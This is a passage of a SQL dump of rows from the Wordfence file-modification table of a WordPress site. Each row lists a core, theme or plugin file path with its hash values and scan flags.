(0x3678c0b762798e13814ba6d77f71aa29, 'wp-content/themes/Impreza/framework/plugins-support/woocommerce/woocommerce.php', 0, 0xd67cae09b5398825b3b891c87d763388, 0xd67cae09b5398825b3b891c87d763388, 0x55184846a17406c865cd7b3d8ca5831b43a3e2c034a29e5f4947f5b4f47673cc, '', 0, '?'),
(0x367bbc4078d7fdf3610c4f15a9d78cbd, 'wp-content/plugins/js_composer/assets/css/lib/vc-material/fonts/vc_material.svg', 0, 0x45e01a45c456e1cc58937aa1c60d7351, 0x45e01a45c456e1cc58937aa1c60d7351, 0x93949e51b5f26367fa37765c57598c9d55890b90c5111e6be110103bf34ca791, '', 0, '?'),
(0x36825d6ae07619d957b96b0d332d7fe7, 'wp-admin/load-scripts.php', 1, 0x00000000000000000000000000000000, 0x3730858979e46b8f2bc5ebb5d941eaf2, 0x8f8fe1430accca9bda8921472b97150d93e0088704c8ba1d960b3f3d21bfc761, '', 0, '?'),
(0x369a488386555eadc41f2646efe7a557, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_original_24px.svg', 0, 0x5c3ade0d39eda0e843588c7391e73cb7, 0x5c3ade0d39eda0e843588c7391e73cb7, 0x7ce73c4348b86977ad739df6bbf2b43da3fe83e1e76cb7e29ae4c3c7959d62ef, '', 0, '?'),
(0x369d3d35aa3d0c83a2156210f5da38aa, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_interactive_banners.php', 0, 0xca922cbb5c44320c2bf33589173d86ee, 0xca922cbb5c44320c2bf33589173d86ee, 0xfb8e4d3a249b0bccee2e8889de2a8df512307a5238c5e60f50f4aa38b405df03, '', 0, '?'),
(0x36b8003f6aff9fb93f146f06802fea6d, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_outline_blank_24px.svg', 0, 0x05fb62f207210a16641a1548de40aa9d, 0x05fb62f207210a16641a1548de40aa9d, 0x11d3126609399311df6018639ef32dc017a3e87864f8ea2bfd2eb1767be6f327, '', 0, '?'),
(0x36bf92ec73f5aa4ae65f448e1214b9c1, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money2.svg', 0, 0xa10780e584e01bf94a06e3b1b8394e62, 0xa10780e584e01bf94a06e3b1b8394e62, 0x11fbb7d11587dfdbb8a1a4d32f9990c899eda6b19bf4fd48631bf9af0ef74583, '', 0, '?'),
(0x36c5723c6eab3fa8cf930ac66fe69f7b, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_24px.svg', 0, 0xc7ba69a21e85a50e1a4b43de115e226c, 0xc7ba69a21e85a50e1a4b43de115e226c, 0x67a8bdc163d7a4981f19cd038d8959b48ca63afa98f9181d17b5437a2bd0f73a, '', 0, '?'),
(0x36cb480b0a179f3c92e658d166c77bee, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user06.svg', 0, 0x7bbe10df5fab6cbb740b3685a2059193, 0x7bbe10df5fab6cbb740b3685a2059193, 0x53ded256705fddfd19d85e94c3cec769225098cf53f0cbb92e3468c9299cda73, '', 0, '?'),
(0x36cca02cf5f85f908bec71f2eaf97585, 'wp-admin/includes/class-wp-filesystem-ftpext.php', 1, 0x00000000000000000000000000000000, 0x67f736ce6c360c6ffc629247c64030ee, 0x0b394b2119f7651b9034c95cfb89f6c55203f4d4847bfe04f8f84432c4dbb1ff, '', 0, '?'),
(0x36d9a80917ceff0e3a7b945e0544e189, 'wp-includes/js/jquery/ui/accordion.min.js', 1, 0x00000000000000000000000000000000, 0xe89a7c428e49ea602d7ec04809663edc, 0xb3b75e651fb00640c385f23ea9d50b7d08a59b5ac3541e364ccaeba7db31e65c, '', 0, '?'),
(0x36da3b23091e02d8fa0f256c2bf9beb4, 'wp-content/plugins/revslider/languages/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x36e306d08ddd18863690970c2facb0d1, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button.php', 0, 0xf299cafac488732b6d5c1bb29f2b3f90, 0xf299cafac488732b6d5c1bb29f2b3f90, 0xbdf0c21dc8ee6e838593f703c216518197ff405afe906c72a0b32b333ed032b4, '', 0, '?'),
(0x36e8b93624d06d89039764873bcff677, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_24px.svg', 0, 0xc7d7fdce14a03a9cf4ff8ec998d7f7e7, 0xc7d7fdce14a03a9cf4ff8ec998d7f7e7, 0x4d214ce74159283b33427e7ae332f27d926903c10bf0594a96b37f57169b8a55, '', 0, '?'),
(0x36f1bd2660e05774c558ddb871671314, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_create_new_folder_24px.svg', 0, 0x03d0723bb9f3da20a5e2139cdb8ca6ba, 0x03d0723bb9f3da20a5e2139cdb8ca6ba, 0x1e54d74686b9f8c67308b2d53368a76d4b67487ed73667686f1d241b50e5f1a7, '', 0, '?'),
(0x36f6bb932212691188bb6e47b91ae5d8, 'wp-content/plugins/revslider/admin/assets/imports/vimeo-gallery/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x3709f41df3e09106e5ee641348a6aee2, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_5_24px.svg', 0, 0x129566c4345090c58fc0d980aaf491c3, 0x129566c4345090c58fc0d980aaf491c3, 0x378afbfa6b21ad931b64c0506789bc5fab371d1cc56f6c9a3a58ecb18d3fa431, '', 0, '?'),
(0x371a57b9191cef65d2af193f8fad0461, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design03.php', 0, 0x289ed7f74ee3d00c9326dbfa2517aa4d, 0x289ed7f74ee3d00c9326dbfa2517aa4d, 0x42d7fc7b177e7eb9771423ee0cba584949963ab70027313ee7ce6f85e07b7307, '', 0, '?'),
(0x3722bff3aee5a6bf57960d8ac4d1bdcd, 'wp-content/plugins/wordfence/lib/menu_wordfence_central.php', 1, 0x00000000000000000000000000000000, 0x6ed586de4b0e764ff8d49c27bcbbd500, 0xfdb80311e2ef5e7b41e88d972e46b3cbd8aef2fd8fb322d56da4b6293ee7d054, '', 0, '?'),
(0x37245e5a778ac31d4542ff5bd355eddb, 'wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js', 0, 0x0f3e20bc9f0a2613d6b8160a20c1b928, 0x0f3e20bc9f0a2613d6b8160a20c1b928, 0xb3fb7727f02fe70dc9ecc7687eb812fa004005a741cc380e7242b09e1b52171e, '', 0, '?'),
(0x373ae820ff3265c275fc44e29a0967e7, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/video-banner.min.js', 0, 0x4161b0312646718c156ba40253ff8396, 0x4161b0312646718c156ba40253ff8396, 0x466f108777676ce72b5d8ecb993136c47e4f8268352281a6318ed382edad67db, '', 0, '?'),
(0x373b35175864353a9dab7fa5c4c33a45, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_24px.svg', 0, 0x04c21e257897a1f1eefd5fa0e6b56a0f, 0x04c21e257897a1f1eefd5fa0e6b56a0f, 0xe81b9739561c7843ecce24d9ef4248fa7f2e951283a95edbd1d2b1433452f290, '', 0, '?'),
(0x373fc4059836d4e92c4295015b44404a, 'wp-content/themes/Impreza/framework/functions/post.php', 0, 0x1d34100cb57a87dc380094762b4280d1, 0x1d34100cb57a87dc380094762b4280d1, 0xb402e0b2345c892a33b74c8ee76816c66eb1f628e7e4f69b99030a5a240d440a, '', 0, '?'),
(0x3741aed19675bbd8e463a755c170dd3a, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/single_element_js.js', 0, 0xfba9b1d756456bb25ecaa3c807660180, 0xfba9b1d756456bb25ecaa3c807660180, 0xa4989930348dea879f0e6d052d91735f826476b325a8be8de37ef707f79878e9, '', 0, '?'),
(0x377291a775468ff198b1191d16404a2c, 'wp-content/plugins/wordfence/lib/wfDateLocalization.php', 1, 0x00000000000000000000000000000000, 0xeb34844b5f4afa32436d63cdadc774dd, 0x448d831d6a79ee161cba082cc44c77de61e4203c5586deda20fcfb17b2f51b53, '', 0, '?'),
(0x377b202dbccdb1007db28a0faf06ab32, 'wp-content/plugins/Ultimate_VC_Addons/admin/script-styles.php', 0, 0xd20ccff039f1d8fbb77a916589984636, 0xd20ccff039f1d8fbb77a916589984636, 0x6db18e7118754655eba5943440d8c47d37d55fd3ed10a864128c58c1ff4ad5c9, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x377c6f4f559b92f97a0045660ebb9ce4, 'wp-admin/network/update-core.php', 1, 0x00000000000000000000000000000000, 0x95b7d47ed7134912270f8d3059100e8c, 0x713d8fae196d03cbad3142e3358e89a37b939e90aed112934ef76c0752efb501, '', 0, '?'),
(0x379b0df54421d45b4a4eefc3bc1ac8bb, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_theaters_24px.svg', 0, 0xc1ef48c80d18e292325299b7daa48d19, 0xc1ef48c80d18e292325299b7daa48d19, 0x6af566870489306b0cc8dfb67a63a07ecdd18a4012729f8f5e6630e02eb8f001, '', 0, '?'),
(0x37a6e34d1c7db041bf5481c10c48c666, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/office-chair.svg', 0, 0x79fb0dc6bd313c16f1b16d80d035937e, 0x79fb0dc6bd313c16f1b16d80d035937e, 0xe35e9d1c6e33228eb1dabc38f51f322d8e032045ca40181f8d6137935f6d5b89, '', 0, '?'),
(0x37ab2557797ed7b9503f0f10ab78f2e7, 'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png', 1, 0x00000000000000000000000000000000, 0xa56c7a563660776d5a421c730b8dcfd6, 0x0d20a13817f3feaf1426f84ae4a63334b0d0b1a5dac7bd03101603bfbbc1bdfe, '', 0, '?'),
(0x37b287906f045e6cca3a8dd2cb42100c, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php', 1, 0x00000000000000000000000000000000, 0x98c1098c12e649a5ddb6158d33828b53, 0x214dda92deab4477a395e9de776528b221cee4f63def19e9dea864e0d62c4757, '', 0, '?'),
(0x37c063eec2a229dce61e1753f36562b5, 'wp-includes/js/jquery/ui/menu.min.js', 1, 0x00000000000000000000000000000000, 0x2bc433c534a14d09f1f8a2d060ebc7eb, 0x9f31ebdc44c29027846543ad1dd724dc3b776bc7fae547d51330660588f573d2, '', 0, '?'),
(0x37c063f72e0c245021d7228cf2b99a86, 'wp-content/plugins/wordfence/images/sort_desc.gif', 1, 0x00000000000000000000000000000000, 0xa93c84aed56aff8c5fb3cb8a04529d32, 0x2a86effe2df539d42eb9fbbe48474f16362f1203ee4cc2293a9043d764c37ae3, '', 0, '?'),
(0x37c9b7f5d5f70844f0299a27c31241c8, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank.svg', 0, 0x5e1277ad79ea23f029a759c0bc22d4e4, 0x5e1277ad79ea23f029a759c0bc22d4e4, 0x01f38624f2a270fc799785443a68fc2a1cada3c7ece65b2592bf4f6fe39581b0, '', 0, '?'),
(0x37e1a3ca3535b33a50276ceff5e975bd, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-icon.svg', 0, 0x86fe4e82d3097777d081fa3dd801a7f7, 0x86fe4e82d3097777d081fa3dd801a7f7, 0xed6c776bdb04686558aa2c8fa124c92b6cf243a11f76961eb214a656b1602e2c, '', 0, '?'),
(0x37ecd0f3a56bb058f866b4586dff5385, 'wp-includes/js/dist/vendor/wp-polyfill-fetch.js', 1, 0x00000000000000000000000000000000, 0x456c02ee2a496580a24e5aee614ba9b3, 0x8b4bf6112b7cd9f0dbccab4d354a8de9a6e9f2cd79ca1230079d4974a56c6f6c, '', 0, '?'),
(0x37fe2689ff9bfc4f1fd7bd552adcfc7d, 'wp-content/plugins/js_composer/config/content/shortcode-vc-round-chart.php', 0, 0x1e4de0128e204c80168b413461820691, 0x1e4de0128e204c80168b413461820691, 0xc3603f5c40eddc0a1caa01cc815d2b835936476ac14ae67b15b811e628debaaf, '', 0, '?'),
(0x380068d1b7736313e4294d157684062e, 'wp-content/plugins/revslider/admin/assets/imports/photography-carousel/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x383dc049e5aff461f7259c836bd27eaf, 'wp-admin/js/editor.js', 1, 0x00000000000000000000000000000000, 0xf34b196dd1411f3ab1cd1b9f284f02d5, 0x366d3a2d63b0316a805e2a4d30618476e900533d0d11c47c6310e2d3ce8f07c5, '', 0, '?'),
(0x383f3642880dbeddf7706c32ba52dc78, 'wp-content/wflogs/config-synced.php', 0, 0x955746eb4092c4a5474f4eb8e9705d3d, 0x955746eb4092c4a5474f4eb8e9705d3d, 0x7e45a0b3b40a3ccee3bfc15fde923bf4ceb23018fe77725e8f46ca1ddfebb33a, '', 0, '?'),
(0x3850d6a71bea1a05bc4847457d1538da, 'wp-includes/Requests/Exception/HTTP/306.php', 1, 0x00000000000000000000000000000000, 0x57737a071fa1754e50db6adcc9f25875, 0x348155be9d16a7510d31235f66baadbc05a2a2b048a6fb922a4919d1646cbf9f, '', 0, '?'),
(0x3859adf5c5769dbfeb43c95b2c029e89, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php', 1, 0x00000000000000000000000000000000, 0xdd3a00f0d13eb29781edd8c77d4c5100, 0x13c0efc35f55005d713dd5898aae66815cbf2fa0094064a1cc0da82b76dc2a28, '', 0, '?'),
(0x3879f8d16fce0eb71420f7e104380c02, 'wp-content/plugins/revslider/includes/page-template.class.php', 0, 0x9e03ca55d4476b1ffd92bd60658289d2, 0x9e03ca55d4476b1ffd92bd60658289d2, 0x06738660ca14b0d4f7585872d0630bbe8e3300d10fb1471c28c03c00a3c4e67a, '', 0, '?'),
(0x38847586f5a0ad90cba2a5f71594a6b3, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/slick.min.js', 0, 0x4d85c615332d5e23f2a0a3ea3599a79c, 0x4d85c615332d5e23f2a0a3ea3599a79c, 0xff7726a342d27a2d647df07d56365bf1cfb7f8ad3cb2bdf61f4c09ba1d6eb0e9, '', 0, '?'),
(0x3892b3827af1eac6b4b38f0155e97792, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_transform_24px.svg', 0, 0xa849b19f832dad68346b155b0ed7e5be, 0xa849b19f832dad68346b155b0ed7e5be, 0x6dd7d311d51a3cdc04d63bb0a534d937014b4789695137d482b2a9516fdf0a6d, '', 0, '?'),
(0x389e5236da4448b08a71a32d7b8e3a60, 'wp-admin/includes/translation-install.php', 1, 0x00000000000000000000000000000000, 0x48371cdd290a5d3751f6d7b1a9f6b8a8, 0x5b328584162198a0dd76b4dae3f0481a1e6df101f991108e6657325078f32e86, '', 0, '?'),
(0x38a94029fdb13679675b0679e5735152, 'wp-admin/css/deprecated-media-rtl.css', 1, 0x00000000000000000000000000000000, 0x48e00fdbf199890d49677720c9a98ea3, 0x54ae6a266db0acf0467e677485c8bd00b2a0d25dc763fa741004409a1399d09a, '', 0, '?'),
(0x38c39b5a459151247d185550f654a3e0, 'wp-content/plugins/wordfence/lib/wfCrawl.php', 1, 0x00000000000000000000000000000000, 0x8c31cce99387aedc997e16d20b0dfc6d, 0x2526b9e3398b090f2f44f75847fbd89ed8df8783e255e4bbefe281ea10800434, '', 0, '?'),
(0x38c848141abf1137b081b060b5b31d92, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-column.php', 0, 0x8fb379fdcde748b326234419a5c8c5a2, 0x8fb379fdcde748b326234419a5c8c5a2, 0x22495361c2714ff4b99abb6bf3db81b1b551d2f9809455ff4f4be0f4e5e3d98d, '', 0, '?'),
(0x38c8d7de46fa131067e27338d31a07a9, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tabs.php', 0, 0x0afa098251f4817ca984fe5f77d382c1, 0x0afa098251f4817ca984fe5f77d382c1, 0x8483d96d3abad7ee23a0de13419a97566f9c32c563aa1f8f0318184b686c1686, '', 0, '?'),
(0x38dc9e74c6eebb1a77844e7861b0e4a9, 'wp-includes/class-wp-network.php', 1, 0x00000000000000000000000000000000, 0x7dd29c410f0adcf22553d3e48f6fe86b, 0x6b39efca88ada25d2f30b96fd5146e336ba60233e540a8a87dbbbbae3a340bb5, '', 0, '?'),
(0x38fc26e71dba7ce0ec636d2bf9def251, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Headings.php', 0, 0x07b96b14df663cc56ada2d57449bdd59, 0x07b96b14df663cc56ada2d57449bdd59, 0x3fd67f9d04118892b2d4cb148875a6acead4d2f4c73706b01817cef3c9e6967c, '', 0, '?'),
(0x3908ba0d3527580ef9fdc63e1e3f7f92, 'wp-includes/js/customize-preview-widgets.js', 1, 0x00000000000000000000000000000000, 0x7a62917d11fdead57427817f23871ad5, 0xec9a3373af394f1578e8e3e5f056fd22934d8dee4eeb6db6242e0f62b0321fa0, '', 0, '?'),
(0x391ccf885b130f9f31647bc4f4ee4008, 'wp-includes/class.wp-styles.php', 1, 0x00000000000000000000000000000000, 0xd88c3a3e8c01808b2cbbdaf2322c0e9e, 0xa4b857aa42de5ff3b099a379976e9ace8409501e1c1574b6576a64a8ae1ca09c, '', 0, '?'),
(0x391dccb081b6fb105a7a25a492753fc4, 'wp-content/plugins/js_composer/include/classes/core/access/class-vc-role-access-controller.php', 0, 0x2004f33d51332641da69c689b53026c2, 0x2004f33d51332641da69c689b53026c2, 0x8a7464f4efac9649a4d1f986caff22a90216b0aea67710f37000f8e47aa7bc1b, '', 0, '?'),
(0x393af99764af6f0a91f070605279a8a2, 'wp-includes/js/tinymce/langs/wp-langs-en.js', 1, 0x00000000000000000000000000000000, 0x08f8669f7453b17563a62e6bbb376137, 0x8dbe7b68c240eefbb7449a30f84bd9e5d263782c544d4815643fa60c14412dab, '', 0, '?'),
(0x394288ba2fb73220d7648f96660c0283, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_left_24px.svg', 0, 0x5256c0949ff8be2a0ea03ab4a48e3251, 0x5256c0949ff8be2a0ea03ab4a48e3251, 0x4cc2dbdb0e9adf16857d27a4f48a42dbbf92cebe159347265fa4ce135cc905d5, '', 0, '?'),
(0x396bb97342c2ce3d7dd5ed54c5836337, 'wp-includes/sodium_compat/src/Core/Poly1305/State.php', 1, 0x00000000000000000000000000000000, 0x569cc8cf7a1fc892b9fa6028e56c45d2, 0x91badaebd0e9e2afa0e79b8daed9f6dcd6e3df0cd4b51d4ab15cc45ff87a5b13, '', 0, '?'),
(0x396d9f57ee8837a8e26f8ef81bbbb34d, 'wp-content/themes/Impreza/header-shop.php', 0, 0x4feb8014d3c0229bdbf83f578fdc8a84, 0x4feb8014d3c0229bdbf83f578fdc8a84, 0x9645af50980e66bde26d719044a3db5b9fd30e316572f0d5b67c9a0de79b3391, '', 0, '?'),
(0x39767afdb8e1edb19393a139ca0d76a8, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-attributes.php', 0, 0x78da5c9c4198252adaecda583910caf0, 0x78da5c9c4198252adaecda583910caf0, 0xe104b1a005a50cbb202a6d53a68fe05c732305944c95a16d5f3690dad1e4ef42, '', 0, '?'),
(0x39782f91c93e0c4c2b73be91226cade3, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_linked_camera_24px.svg', 0, 0x2c88a051c9bbd78646420cbd2ab48b75, 0x2c88a051c9bbd78646420cbd2ab48b75, 0xd00baf58308063ab733ca4737a6718d75d4b903e8869ab97c0981b5b830410e9, '', 0, '?'),
(0x3991af34a70c7453ed0d52f2b6c5b910, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_mac_24px.svg', 0, 0x96a57f12ad2ddd3f5aced272bb80a2fe, 0x96a57f12ad2ddd3f5aced272bb80a2fe, 0x3c456ca728d77096dae623770f98bd570ea2988cf16731f1dcc15837d0361708, '', 0, '?'),
(0x39977d20425ebfb23f09eb9d22eb7f0c, 'wp-includes/script-loader.php', 1, 0x00000000000000000000000000000000, 0x9eb9afc5c745d40ee9c57b868b655e4d, 0xfc3c93e977b09feec1bd73f3db991615482b6858288fa1434e73beb6665c24da, '', 0, '?'),
(0x39d58dd2a2d5ec39f1eb640d12eb8a59, 'wp-includes/ID3/license.commercial.txt', 1, 0x00000000000000000000000000000000, 0x0a3b670896fc4a8067adb2c6d978418e, 0xbb745f32bf12780eca3c0bb1ec2d8ca3edcb9c7771dd49bf6799c91f1004f318, '', 0, '?'),
(0x39d671a61072b609974d42447f0d9a8c, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_24px.svg', 0, 0xa06125e5c32d7ee6b47581ef7f681399, 0xa06125e5c32d7ee6b47581ef7f681399, 0x1189fa7142a0da57a03d8c01083db0479e844c5dd5011bbd2c63fc2b742aea57, '', 0, '?'),
(0x39dffe352dab1eda69438c7e9c1c6a27, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_land_24px.svg', 0, 0xdcababd898c4fe612a6a9e4b0de43a1f, 0xdcababd898c4fe612a6a9e4b0de43a1f, 0x723f868bdd96154eaa417b13e8ad70c8bbc1b4da85b15bbae3612445be53f0b7, '', 0, '?'),
(0x39e59f72c32f9e0b455f03d4c29103da, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_none_24px.svg', 0, 0x562719fae62d7f30ccfd2a7eb2b2d9c2, 0x562719fae62d7f30ccfd2a7eb2b2d9c2, 0xec17de764004d706e1f3fed5848e4d20fc9285931a2bbe08c285b7210d2a909b, '', 0, '?'),
(0x39ed89e673b433d953055a2c70e93867, 'wp-includes/images/media/text.png', 1, 0x00000000000000000000000000000000, 0x7ab98773e6e430f718c89d9f5119804b, 0x8d6712aeca3f5bf59f442adf709438807119f29ee205b856d193e6913e8ef54e, '', 0, '?'),
(0x39f081e3c72979417ea93bb2cc3d9051, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/imgradio.php', 0, 0x47104dbe6f75ca0c4477d5150c27877a, 0x47104dbe6f75ca0c4477d5150c27877a, 0x43dbb760512e0d5b8f2195da7f7ff6ed6c781d79bd8fea320c52156179257354, '', 0, '?'),
(0x39f1c0c3c3928666919978a94f4078be, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_domain_24px.svg', 0, 0x9e216ce649eaf057483c8e945901a297, 0x9e216ce649eaf057483c8e945901a297, 0x6e40051099b1d60371d53dd0a241dc5d564a81f0108552d596d2b74d257941e4, '', 0, '?'),
(0x39fb73fdc162e5a43fbdf5d693a79288, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_gmaps.php', 0, 0x69531578587bd8851e1117284cd5c454, 0x69531578587bd8851e1117284cd5c454, 0x16d00cf64d7b147f3be106d915a625f44514f717e5add75b5962a2e64b026ba7, '', 0, '?'),
(0x39ff9119a8d7fc5e471681594d34af88, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_spellcheck_24px.svg', 0, 0x7782e6e8025dea8b4f5c3ab9eb4e98ac, 0x7782e6e8025dea8b4f5c3ab9eb4e98ac, 0x766e433b8e655ffa6673b392325306ceb8bd1ec8f6f1d9868b5b4b16bbcc3c69, '', 0, '?'),
(0x3a0f7bc3e2ec7b37ca39b0899ff01f7f, 'wp-admin/link.php', 1, 0x00000000000000000000000000000000, 0xaa95f098be40be63d9cc8373ef950f54, 0x6c1572ed0e19e41383528056cc9a180360e0422b6321a7620dc6e0bd06e5ac0d, '', 0, '?'),
(0x3a1268cd2088ebe8f223eba1956003d5, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_gradient_24px.svg', 0, 0x8bb11631b33de8aa1634b24f8fe6f1d7, 0x8bb11631b33de8aa1634b24f8fe6f1d7, 0x3e03cb96b45d02b025bbe33cbf5de1ff29814a972338f4b936401479c06ea1e6, '', 0, '?'),
(0x3a18ae7c4cfb483628cedf63b56782d6, 'wp-includes/ID3/module.audio.ogg.php', 1, 0x00000000000000000000000000000000, 0x532859d598cfc5a7f6120fa40cc852ee, 0xdf3532702c1314b76165346ee868807698f94e8bb08eb34ff4acab62bde2913a, '', 0, '?'),
(0x3a2294c0048da89c6928d9c3325872c5, 'wp-content/plugins/js_composer/include/params/hidden/hidden.php', 0, 0x9336164950668b01ac6b579fb8300d26, 0x9336164950668b01ac6b579fb8300d26, 0x6705f77f1082b07e4d1204d7bdee9939226b13540ca24e2bdd3a5cd0dff13992, '', 0, '?'),
(0x3a318328ac2904705d5631a92dc8a99c, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php', 1, 0x00000000000000000000000000000000, 0x9971444c87dfde61aa5b093fe0af2406, 0x479f7300ebe50dc32f31f702763dfa84a9d57f8bb77053102dab79452ed4d255, '', 0, '?'),
(0x3a3416075e5d6c0b23b669c36e664ed2, 'wp-content/plugins/wp-super-cache/advanced-cache.php', 1, 0x00000000000000000000000000000000, 0x7f18d38986f225dfbdee86991b553e64, 0xd1bc3420a577784bc4c4cb62a80f45cd23653c016628432596aade731a148920, '', 0, '?'),
(0x3a3746ebf056420a62469f4a72691029, 'wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-faq.php', 0, 0x1d7298c7761c499626f4b5ff3664488a, 0x1d7298c7761c499626f4b5ff3664488a, 0x1763feac3d8ae23d142d37a13594300202e15e8c0be6c4b5bcd780ae85620c96, '', 0, '?'),
(0x3a3cb724168e7fcd302c77222665287b, 'wp-includes/class-feed.php', 1, 0x00000000000000000000000000000000, 0x6f5f5ef9d5c54e52658a7c416589d25b, 0x92f393cdb92b572a231ca30049c53e886c6fc88518c2fab0047319c201e6adb2, '', 0, '?'),
(0x3a44e94a9d24eda56813bb86c7850dd9, 'wp-admin/js/customize-nav-menus.js', 1, 0x00000000000000000000000000000000, 0xaff331bc7e43fdefe81544ce420ce9b3, 0x50b1f7d726265dc43f380f16ceb6f2c6008b35ad2c65065876db83836eb7ec12, '', 0, '?'),
(0x3a4bbfd92b94de0f35921cb4f830b240, 'wp-content/plugins/revslider/includes/object-library.class.php', 0, 0xc3b84956213790f7fc8540048d4dd9ce, 0xc3b84956213790f7fc8540048d4dd9ce, 0xd5c082bb3d055a6ecc16352b1c38c510e8f8d4e1345c0300c1f51cadaea9245a, '', 0, '?'),
(0x3a5d3639b877ac912a367d2847d7c8ca, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_not_interested_24px.svg', 0, 0x30a5e7b31c7ddef68f1d7d95207782f1, 0x30a5e7b31c7ddef68f1d7d95207782f1, 0x040fede2ebe5b991a9e5a7a5913677185801ccf6104b5d493bb70578f69a34a2, '', 0, '?'),
(0x3a8c8ae525486021acfbe10d06e8805a, 'wp-admin/js/media-gallery.min.js', 1, 0x00000000000000000000000000000000, 0x53b0f902ba530b9ebfc3716ff006c8a4, 0xa1f8737891a6dc4befb6d0ebd0f6ef7b8dea22e80e58dbc031178c08d0111a9d, '', 0, '?'),
(0x3a94b5a9a848c12c33c03e771f5c43d1, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_photo_24px.svg', 0, 0xede24c91689b1f32f4e07e17d5e0b720, 0xede24c91689b1f32f4e07e17d5e0b720, 0xbd842ac65d3400ca4174b0814a5bee9313d42e76048f748c829e5bb9499faed1, '', 0, '?'),
(0x3aa6acb5af06d152c12a621e63ad686c, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar2.svg', 0, 0xa51465eb4dfe1122ba197aacac4428fe, 0xa51465eb4dfe1122ba197aacac4428fe, 0x9db8b162ab50ea0960ac3cee74132f64860c1e5ea0aeaf384f7ba062c72fdf69, '', 0, '?'),
(0x3ad274c6f00791eae82905bb953c7597, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_single_image.php', 0, 0x52ad571e0e2e7364388eb6d3658b9f0b, 0x52ad571e0e2e7364388eb6d3658b9f0b, 0xf1f44e0166d77b1f079a8c90d7f6e4c688815668db71581b96561495e1ca9eb6, '', 0, '?'),
(0x3aef5871dd9daf4a5ca63550f2b63403, 'wp-includes/images/spinner.gif', 1, 0x00000000000000000000000000000000, 0xd54cf50a44bd0aca6fd98bd46acbb2ba, 0x7ac68411e01a22ffb26e1a73b228ce55b60e2f7ef71537ba8046abf85ec285e3, '', 0, '?'),
(0x3af07b115f3c1c1490ba64da461738d5, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_pinterest.php', 0, 0x17bc9389a11830fee54d72632e20d9a2, 0x17bc9389a11830fee54d72632e20d9a2, 0xb5a4dc6cae351c1ac72be40f76603830d0efff288d5bcd286e4a305b8ac20105, '', 0, '?'),
(0x3af96e1fcca31f524deb7469239af53d, 'wp-includes/images/media/audio.png', 1, 0x00000000000000000000000000000000, 0x8674614341f1bec5feb22eb7e75adfc0, 0xa04ce43ea29124a8c10ab26f691d786f0c6a2d0a4ccfd318f5c0e15d473b710b, '', 0, '?'),
(0x3b0223bf096ea98fe5dc25221bf59df9, 'wp-includes/Requests/Exception/HTTP/404.php', 1, 0x00000000000000000000000000000000, 0x1ed416cc6311835900857973f8923c4d, 0xc2d52d2156b008bb3e64a62a076a508c46dd09c83b51c6b5b19a4e3161479c28, '', 0, '?'),
